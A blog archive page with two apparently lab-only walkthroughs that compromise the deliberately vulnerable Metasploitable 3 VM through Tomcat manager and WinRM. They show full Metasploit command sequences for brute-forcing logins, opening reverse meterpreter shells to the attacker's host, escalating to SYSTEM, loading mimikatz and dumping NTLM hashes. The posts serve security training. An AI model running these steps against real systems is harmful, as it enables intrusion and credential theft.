The Internet of Stuff and Things: January 2017

Saturday, January 21, 2017

Metasploitable 3 - Exploiting Tomcat

Metasploitable 3

Exploiting Tomcat

If you remember, this are the services that NMAP found running on metasploitable 3, on TCP port 8282 there's a Apache Tomcat server running and that's the one I'll exploit for this post.

Services
========

host port proto name state info
---- ---- ----- ---- ----- ----
10.20.10.23 21 tcp ftp open Microsoft ftpd
10.20.10.23 22 tcp ssh open OpenSSH 7.1 protocol 2.0
10.20.10.23 80 tcp http open Microsoft-IIS/7.5 ( Powered by ASP.NET )
10.20.10.23 161 udp snmp open SNMPv1 server public
10.20.10.23 445 tcp smb open
10.20.10.23 1617 tcp nimrod-agent open
10.20.10.23 3000 tcp http open WEBrick/1.3.1 (Ruby/2.3.1/2016-04-26)
10.20.10.23 4848 tcp https open Oracle GlassFish 4.0 Servlet 3.1; JSP 2.3; Java 1.8
10.20.10.23 5985 tcp http open Microsoft HTTPAPI httpd 2.0 SSDP/UPnP
10.20.10.23 5986 tcp http open
10.20.10.23 8020 tcp http open Apache httpd
10.20.10.23 8022 tcp http open Apache Tomcat/Coyote JSP engine 1.1
10.20.10.23 8027 tcp open
10.20.10.23 8080 tcp http open Oracle GlassFish 4.0 Servlet 3.1; JSP 2.3; Java 1.8
10.20.10.23 8282 tcp http open Apache-Coyote/1.1
10.20.10.23 8383 tcp https open Apache httpd
10.20.10.23 8484 tcp http open Jetty winstone-2.8
10.20.10.23 8585 tcp http open Apache/2.2.21 (Win64) PHP/5.3.10 DAV/2 ( Powered by PHP/5.3.10 )
10.20.10.23 9200 tcp http open Elasticsearch REST API 1.1.1 name: Mammomax; Lucene 4.7
10.20.10.23 9800 tcp http open
10.20.10.23 49153 tcp msrpc open Microsoft Windows RPC
10.20.10.23 49154 tcp msrpc open Microsoft Windows RPC
10.20.10.23 49263 tcp open
10.20.10.23 49264 tcp tcpwrapped open

When I use my browser I can confirm it's a Apache Tomcat and it's showing the default web site with a link to the manager webapp.

Apache Tomcat's default web site with manager webapp link

Clicking on the link shows me a dialog box requesting Authentication.

Authentication Request for /manager/html

After failing several combinations of usernames and passwords to login, I clicked on the Cancel button and find a 401 Unauthorized message disclosing information about where to find credentials for the web manager app.

Authentication fails with a 401 message and Disclosure of Information

It seems the credentials can be found in a conf/tomcat-users.xml file somewhere in the file system.

First, let's try a simple brutforce using metasploit to see if we can guess the username and password from the built-in word lists.

msf > info auxiliary/scanner/http/tomcat_mgr_login

Name: Tomcat Application Manager Login Utility
Module: auxiliary/scanner/http/tomcat_mgr_login
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:
MC <mc@metasploit.com>
Matteo Cantoni <goony@nothink.org>
jduck <jduck@metasploit.com>

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no The HTTP password to specify for authentication
PASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 8080 yes The target port
SSL false no Negotiate SSL/TLS for outgoing connections
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
TARGETURI /manager/html yes URI for Manager login. Default is /manager/html
THREADS 1 yes The number of concurrent threads
USERNAME no The HTTP username to specify for authentication
USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host

Description:
This module simply attempts to login to a Tomcat Application Manager
instance using a specific user/pass.

References:
https://cvedetails.com/cve/CVE-2009-3843/
OSVDB (60317)
http://www.securityfocus.com/bid/37086
https://cvedetails.com/cve/CVE-2009-4189/
OSVDB (60670)
http://www.harmonysecurity.com/blog/2009/11/hp-operations-manager-backdoor-account.html
http://www.zerodayinitiative.com/advisories/ZDI-09-085
https://cvedetails.com/cve/CVE-2009-4188/
http://www.securityfocus.com/bid/38084
https://cvedetails.com/cve/CVE-2010-0557/
http://www-01.ibm.com/support/docview.wss?uid=swg21419179
https://cvedetails.com/cve/CVE-2010-4094/
http://www.zerodayinitiative.com/advisories/ZDI-10-214
https://cvedetails.com/cve/CVE-2009-3548/
OSVDB (60176)
http://www.securityfocus.com/bid/36954
http://tomcat.apache.org/
https://cvedetails.com/cve/CVE-1999-0502/

I setup my RHOST and RPORT, and run the module

msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set RHOSTS 10.20.10.23
RHOSTS => 10.20.10.23
msf auxiliary(tomcat_mgr_login) > set RPORT 8282
RPORT => 8282
msf auxiliary(tomcat_mgr_login) > run

[-] 10.20.10.23:8282 - LOGIN FAILED: admin:admin (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: admin:manager (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: admin:role1 (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: admin:root (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: admin:tomcat (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: admin:s3cret (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: admin:vagrant (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: manager:admin (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: manager:manager (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: manager:role1 (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: manager:root (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: manager:tomcat (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: manager:s3cret (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: manager:vagrant (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: role1:admin (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: role1:manager (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: role1:role1 (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: role1:root (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: role1:tomcat (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: role1:s3cret (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: role1:vagrant (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: root:admin (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: root:manager (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: root:role1 (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: root:root (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: root:tomcat (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: root:s3cret (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: root:vagrant (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: tomcat:admin (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: tomcat:manager (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: tomcat:role1 (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: tomcat:root (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: tomcat:tomcat (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: tomcat:s3cret (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: tomcat:vagrant (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: both:admin (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: both:manager (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: both:role1 (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: both:root (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: both:tomcat (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: both:s3cret (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: both:vagrant (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: j2deployer:j2deployer (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: cxsdk:kdsxc (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: root:owaspbwa (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: ADMIN:ADMIN (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: xampp:xampp (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: tomcat:s3cret (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: QCC:QLogic66 (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: admin:vagrant (Incorrect)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tomcat_mgr_login) >

NO LUCK! 👎

OK, plan B... we use the disclosed information from the 401 Unauthorized access web page, it says there's a conf/tomcat-users.xml somewhere, so we use an older exploit to go look for it.

msf exploit(manageengine_connectionid_write) > run

[*] Started reverse TCP handler on 10.23.10.200:4444
[*] Creating JSP stager
[*] Uploading JSP stager Oynza.jsp...
[*] Executing stager...
[*] Sending stage (957487 bytes) to 10.20.10.23
[*] Meterpreter session 3 opened (10.23.10.200:4444 -> 10.20.10.23:50324) at 2017-01-20 22:26:44 -0500
[+] Deleted ../webapps/DesktopCentral/jspf/Oynza.jsp

meterpreter > info
Usage: info <module>

Prints information about a post-exploitation module

meterpreter > sysinfo
Computer : METASPLOITABLE3
OS : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >

meterpreter > getuid
Server username: NT AUTHORITY\LOCAL SERVICE
meterpreter > pwd
C:\ManageEngine\DesktopCentral_Server\bin
meterpreter > cd /
meterpreter > pwd
C:\
meterpreter > search -f tomcat-users.xml
Found 3 results...
c:\ManageEngine\DesktopCentral_Server\conf\tomcat-users.xml (70 bytes)
c:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33\conf\tomcat-users.xml (2309 bytes)
c:\vagrant\resources\apache_struts\tomcat-users.xml (2309 bytes)

meterpreter > cat /Program\ Files/Apache\ Software\ Foundation/tomcat/apache-tomcat-8.0.33/conf/tomcat-users.xml
<?xml version='1.0' encoding='utf-8'?>
...


<role rolename="manager-gui"/>
<user username="sploit" password="sploit" roles="manager-gui"/>

</tomcat-users>

Just like the 401 Page said, there's a manager gui role setup with a username and password in clear text, sploit/sploit
Now I have a gui managers credentials and can try to get a meterpreter with another exploit.
msf auxiliary(tomcat_mgr_login) > info exploit/multi/http/tomcat_mgr_upload

Name: Apache Tomcat Manager Authenticated Upload Code Execution
Module: exploit/multi/http/tomcat_mgr_upload
Platform: Java, Linux, Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2009-11-09

Provided by:
rangercha

Available targets:
Id Name
-- ----
0 Automatic
1 Java Universal
2 Windows Universal
3 Linux x86

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword no The password for the specified username
HttpUsername no The username to authenticate as
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 10.20.10.23 yes The target address
RPORT 80 yes The target port
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /manager yes The URI path of the manager app (/html/upload and /undeploy will be used)
VHOST no HTTP server virtual host

Payload information:

Description:
This module can be used to execute a payload on Apache Tomcat
servers that have an exposed "manager" application. The payload is
uploaded as a WAR archive containing a jsp application using a POST
request against the /manager/html/upload component. NOTE: The
compatible payload sets vary based on the selected target. For
example, you must select the Windows target to use native Windows
payloads.

References:
https://cvedetails.com/cve/CVE-2009-3843/
OSVDB (60317)
https://cvedetails.com/cve/CVE-2009-4189/
OSVDB (60670)
https://cvedetails.com/cve/CVE-2009-4188/
http://www.securityfocus.com/bid/38084
https://cvedetails.com/cve/CVE-2010-0557/
http://www-01.ibm.com/support/docview.wss?uid=swg21419179
https://cvedetails.com/cve/CVE-2010-4094/
http://www.zerodayinitiative.com/advisories/ZDI-10-214
https://cvedetails.com/cve/CVE-2009-3548/
OSVDB (60176)
http://www.securityfocus.com/bid/36954
http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html

msf auxiliary(tomcat_mgr_login) > use exploit/multi/http/tomcat_mgr_upload

Setup username and password found in the tomcat-users.xml

msf exploit(tomcat_mgr_upload) > set HttpPassword sploit
HttpPassword => sploit
msf exploit(tomcat_mgr_upload) > set HttpUsername sploit
HttpUsername => sploit

Setup metasploitable 3 IP address and Tomcat TCP Port
msf exploit(tomcat_mgr_upload) > set RHOST 10.20.10.23
RHOST => 10.20.10.23

msf exploit(tomcat_mgr_upload) > set RPORT 8282

And exploit!
msf exploit(tomcat_mgr_upload) > run

[*] Started reverse TCP handler on 10.23.10.200:4444
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying 4MLnXRl...
[*] Executing 4MLnXRl...
[*] Sending stage (957487 bytes) to 10.20.10.23
[*] Undeploying 4MLnXRl ...
[*] Meterpreter session 4 opened (10.23.10.200:4444 -> 10.20.10.23:50340) at 2017-01-20 23:17:06 -0500

meterpreter > sysinfo
Computer : METASPLOITABLE3
OS : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter >

Great!, I have a 32bit meterpreter with SYSTEM privileges

Let's get a 64bit meterpreter so I can run other tools like mimikats fully.

I send the meterpreter session to the background so I can use it to inject a second payload

meterpreter > background

[*] Backgrounding session 4...

I used a payload_inject exploit for Windows and set the payload to a reverse TCP 64 bit meterprter

msf exploit(tomcat_mgr_upload) > use exploit/windows/local/payload_inject

msf exploit(payload_inject) > info exploit/windows/local/payload_inject

Name: Windows Manage Memory Payload Injection

Module: exploit/windows/local/payload_inject

Platform: Windows

Privileged: No

License: Metasploit Framework License (BSD)

Rank: Excellent

Disclosed: 2011-10-12

Provided by:

Carlos Perez <carlos_perez@darkoperator.com>

sinn3r <sinn3r@metasploit.com>

Available targets:

Id Name

-- ----

0 Windows

Basic options:

Name Current Setting Required Description

---- --------------- -------- -----------

NEWPROCESS false no New notepad.exe to inject to

PID no Process Identifier to inject of process to inject payload.

SESSION yes The session to run this module on.

Payload information:

Space: 4096

Description:

This module will inject a payload into memory of a process. If a

payload isn't selected, then it'll default to a reverse x86 TCP

meterpreter. If the PID datastore option isn't specified, then it'll inject into notepad.exe instead.

msf exploit(payload_inject) > options

Module options (exploit/windows/local/payload_inject):

Name Current Setting Required Description

---- --------------- -------- -----------

NEWPROCESS false no New notepad.exe to inject to

PID no Process Identifier to inject of process to inject payload.

SESSION yes The session to run this module on.

Exploit target:

Id Name

-- ----

0 Windows

msf exploit(payload_inject) > set payload windows/x64/meterpreter/reverse_tcp

payload => windows/x64/meterpreter/reverse_tcp

msf exploit(payload_inject) > options

Module options (exploit/windows/local/payload_inject):

Name Current Setting Required Description

---- --------------- -------- -----------

NEWPROCESS false no New notepad.exe to inject to

PID no Process Identifier to inject of process to inject payload.

SESSION yes The session to run this module on.

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)

LHOST yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Windows

Set my local port and local IP address to be used for a listener for the second meterpreter

msf exploit(payload_inject) > set LPORT 4467

LPORT => 4467

msf exploit(payload_inject) > set LHOST 10.23.10.200

LHOST => 10.23.10.200

msf exploit(payload_inject) > sessions

Active sessions

===============

Id Type Information Connection

-- ---- ----------- ----------

4 meterpreter x86/windows NT AUTHORITY\SYSTEM @ METASPLOITABLE3 10.23.10.200:4444 -> 10.20.10.23:50340 (10.20.10.23)

I tell the exploit to use my background 32bit session for the injection

msf exploit(payload_inject) > set session 4

session => 4

msf exploit(payload_inject) > run

[*] Started reverse TCP handler on 10.23.10.200:4467

[*] Running module against METASPLOITABLE3

[-] PID does not actually exist.

[*] Launching notepad.exe...

[*] Preparing 'windows/x64/meterpreter/reverse_tcp' for PID 6068

[*] Sending stage (1189423 bytes) to 10.20.10.23

[*] Meterpreter session 5 opened (10.23.10.200:4467 -> 10.20.10.23:50345) at 2017-01-20 23:30:34 -0500

meterpreter > sysinfo

Computer : METASPLOITABLE3

OS : Windows 2008 R2 (Build 7601, Service Pack 1).

Architecture : x64

System Language : en_US

Domain : WORKGROUP

Logged On Users : 2

Meterpreter : x64/windows 👍

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > load mimikatz

Loading extension mimikatz...success.

meterpreter > mimikatz... TO BE CONTINUED ... 😁

Also the tomcat credentials have been added to my creds table automatically in case I need them again

Credentials

===========

host origin service public private realm private_type

---- ------ ------- ------ ------- ----- ------------

10.20.10.23 10.20.10.23 8022/tcp (http) admin admin Password

10.20.10.23 10.20.10.23 445/tcp (smb) administrator aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) guest aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) vagrant aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) sshd aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) sshd_server aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035 NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) leah_organa aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028 NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) luke_skywalker aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) han_solo aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951 NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) artoo_detoo aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4 NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) c_three_pio aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) ben_kenobi aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859 NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) darth_vader aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0 NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) anakin_skywalker aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) jarjar_binks aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4 NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) lando_calrissian aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) boba_fett aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9 NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) jabba_hutt aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76 NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) greedo aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) chewbacca aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8 NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) kylo_ren aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001 NTLM hash

10.20.10.23 445/tcp (smb) c_three_pio pr0t0c0l:12 Password

10.20.10.23 445/tcp (smb) vagrant vagrant:5 Password

10.20.10.23 445/tcp (smb) administrator vagrant:3 Password

10.20.10.23 10.20.10.23 8282/tcp (http) sploit sploit Password

BTW, I manged to crack a couple of more passwords, I'll show later. I really want to keep playing with JtR to get them all.

Monday, January 16, 2017

Metasploitable 3 - Hashdump post Authentication

Metasploitable 3

Hashdump post Authentication

Hello again :)

This time we're going to exploit WinRM service running on the server and asume we found the Local Administrator's password but we don't have any other access to the machine.

msf > services

Services

========

host port proto name state info

---- ---- ----- ---- ----- ----

10.20.10.23 21 tcp ftp open Microsoft ftpd

10.20.10.23 22 tcp ssh open OpenSSH 7.1 protocol 2.0

10.20.10.23 80 tcp http open Microsoft-IIS/7.5 ( Powered by ASP.NET )

10.20.10.23 161 udp snmp open SNMPv1 server public

10.20.10.23 445 tcp smb open

10.20.10.23 1617 tcp nimrod-agent open

10.20.10.23 3000 tcp http open WEBrick/1.3.1 (Ruby/2.3.1/2016-04-26)

10.20.10.23 4848 tcp https open Oracle GlassFish 4.0 Servlet 3.1; JSP 2.3; Java 1.8

10.20.10.23 5985 tcp http open Microsoft HTTPAPI httpd 2.0 SSDP/UPnP

10.20.10.23 5986 tcp http open

10.20.10.23 8020 tcp http open Apache httpd

10.20.10.23 8022 tcp http open Apache Tomcat/Coyote JSP engine 1.1

10.20.10.23 8027 tcp open

10.20.10.23 8080 tcp http open Oracle GlassFish 4.0 Servlet 3.1; JSP 2.3; Java 1.8

10.20.10.23 8282 tcp http open Apache-Coyote/1.1

10.20.10.23 8383 tcp https open Apache httpd

10.20.10.23 8484 tcp http open Jetty winstone-2.8

10.20.10.23 8585 tcp http open Apache/2.2.21 (Win64) PHP/5.3.10 DAV/2 ( Powered by PHP/5.3.10 )

10.20.10.23 9200 tcp http open Elasticsearch REST API 1.1.1 name: Mammomax; Lucene 4.7

10.20.10.23 9800 tcp http open

10.20.10.23 49153 tcp msrpc open Microsoft Windows RPC

10.20.10.23 49154 tcp msrpc open Microsoft Windows RPC

10.20.10.23 49263 tcp open

10.20.10.23 49264 tcp tcpwrapped open

msf exploit(winrm_script_exec) > options

Module options (exploit/windows/winrm/winrm_script_exec):

Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN WORKSTATION yes The domain to use for Windows authentification
FORCE_VBS false yes Force the module to use the VBS CmdStager
PASSWORD vagrant yes A specific password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The target address
RPORT 5985 yes The target port
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URI /wsman yes The URI of the WinRM service
URIPATH no The URI to use for this exploit (default is random)
USERNAME Administrator yes A specific username to authenticate as
VHOST no HTTP server virtual host

Exploit target:

Id Name
-- ----
0 Windows

I setup the target RHOST
msf exploit(winrm_script_exec) > setg RHOST 10.20.10.23
RHOST => 10.20.10.23

And the IP address to listen and wait for the meterpreter payload to connect back
msf exploit(winrm_script_exec) > set LHOST 10.23.10.200
LHOST => 10.23.10.200
msf exploit(winrm_script_exec) > set verbose true
verbose => true

I'm going to use the Visual Basic Script option instead of the PowerShell because I couldn't get the session open with PowerShell, I have to take a look at why is this happening. If you know why, please leave a comment, I appreciate any feedback.

msf exploit(winrm_script_exec) > set FORCE_VBS true

FORCE_VBS => true
msf exploit(winrm_script_exec) > options

Module options (exploit/windows/winrm/winrm_script_exec):

Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN WORKSTATION yes The domain to use for Windows authentification
FORCE_VBS true yes Force the module to use the VBS CmdStager
PASSWORD vagrant yes A specific password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 10.20.10.23 yes The target address
RPORT 5985 yes The target port
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URI /wsman yes The URI of the WinRM service
URIPATH no The URI to use for this exploit (default is random)
USERNAME Administrator yes A specific username to authenticate as
VHOST no HTTP server virtual host

Exploit target:

Id Name
-- ----
0 Windows

msf exploit(winrm_script_exec) > run

[*] Started reverse TCP handler on 10.23.10.200:4444
[*] User selected the FORCE_VBS option
[*] Command Stager progress - 2.01% done (2046/101936 bytes)
[*] Command Stager progress - 4.01% done (4092/101936 bytes)
[*] Command Stager progress - 6.02% done (6138/101936 bytes)
[*] Command Stager progress - 8.03% done (8184/101936 bytes)
[*] Command Stager progress - 10.04% done (10230/101936 bytes)
[*] Command Stager progress - 12.04% done (12276/101936 bytes)
[*] Command Stager progress - 14.05% done (14322/101936 bytes)
[*] Command Stager progress - 16.06% done (16368/101936 bytes)
[*] Command Stager progress - 18.06% done (18414/101936 bytes)
[*] Command Stager progress - 20.07% done (20460/101936 bytes)
[*] Command Stager progress - 22.08% done (22506/101936 bytes)
[*] Command Stager progress - 24.09% done (24552/101936 bytes)
[*] Command Stager progress - 26.09% done (26598/101936 bytes)
[*] Command Stager progress - 28.10% done (28644/101936 bytes)
[*] Command Stager progress - 30.11% done (30690/101936 bytes)
[*] Command Stager progress - 32.11% done (32736/101936 bytes)
[*] Command Stager progress - 34.12% done (34782/101936 bytes)
[*] Command Stager progress - 36.13% done (36828/101936 bytes)
[*] Command Stager progress - 38.14% done (38874/101936 bytes)
[*] Command Stager progress - 40.14% done (40920/101936 bytes)
[*] Command Stager progress - 42.15% done (42966/101936 bytes)
[*] Command Stager progress - 44.16% done (45012/101936 bytes)
[*] Command Stager progress - 46.16% done (47058/101936 bytes)
[*] Command Stager progress - 48.17% done (49104/101936 bytes)
[*] Command Stager progress - 50.18% done (51150/101936 bytes)
[*] Command Stager progress - 52.19% done (53196/101936 bytes)
[*] Command Stager progress - 54.19% done (55242/101936 bytes)
[*] Command Stager progress - 56.20% done (57288/101936 bytes)
[*] Command Stager progress - 58.21% done (59334/101936 bytes)
[*] Command Stager progress - 60.21% done (61380/101936 bytes)
[*] Command Stager progress - 62.22% done (63426/101936 bytes)
[*] Command Stager progress - 64.23% done (65472/101936 bytes)
[*] Command Stager progress - 66.24% done (67518/101936 bytes)
[*] Command Stager progress - 68.24% done (69564/101936 bytes)
[*] Command Stager progress - 70.25% done (71610/101936 bytes)
[*] Command Stager progress - 72.26% done (73656/101936 bytes)
[*] Command Stager progress - 74.26% done (75702/101936 bytes)
[*] Command Stager progress - 76.27% done (77748/101936 bytes)
[*] Command Stager progress - 78.28% done (79794/101936 bytes)
[*] Command Stager progress - 80.29% done (81840/101936 bytes)
[*] Command Stager progress - 82.29% done (83886/101936 bytes)
[*] Command Stager progress - 84.30% done (85932/101936 bytes)
[*] Command Stager progress - 86.31% done (87978/101936 bytes)
[*] Command Stager progress - 88.31% done (90024/101936 bytes)
[*] Command Stager progress - 90.32% done (92070/101936 bytes)
[*] Command Stager progress - 92.33% done (94116/101936 bytes)
[*] Command Stager progress - 94.34% done (96162/101936 bytes)
[*] Command Stager progress - 96.34% done (98208/101936 bytes)
[*] Command Stager progress - 98.35% done (100252/101936 bytes)
[*] Sending stage (957487 bytes) to 10.20.10.23
[*] Meterpreter session 1 opened (10.23.10.200:4444 -> 10.20.10.23:49305) at 2017-01-12 21:44:37 -0500
[*] Session ID 1 (10.23.10.200:4444 -> 10.20.10.23:49305) processing InitialAutoRunScript 'post/windows/manage/priv_migrate'
[*] Current session process is UANwR.exe (4488) as: METASPLOITABLE3\Administrator
[*] Session is Admin but not System.
[*] Will attempt to migrate to specified System level process.
[*] Trying services.exe (472)
[+] Successfully migrated to services.exe (472) as: NT AUTHORITY\SYSTEM
[*] nil
[*] Command Stager progress - 100.00% done (101936/101936 bytes)

Great! The exploit gave me SYSTEM privileges automatically

meterpreter > help

...

Priv: Elevate Commands
======================

Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.

Priv: Password database Commands
================================

Command Description
------- -----------
hashdump Dumps the contents of the SAM database

Priv: Timestomp Commands
========================

Command Description
------- -----------
timestomp Manipulate file MACE attributes

I got a meterpreter session with all the goodies

meterpreter > sysinfo
Computer : METASPLOITABLE3
OS : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows

A hashdump will give me a list of all the local NTLM hashes
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
anakin_skywalker:1010:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa:::
artoo_detoo:1006:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4:::
ben_kenobi:1008:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859:::
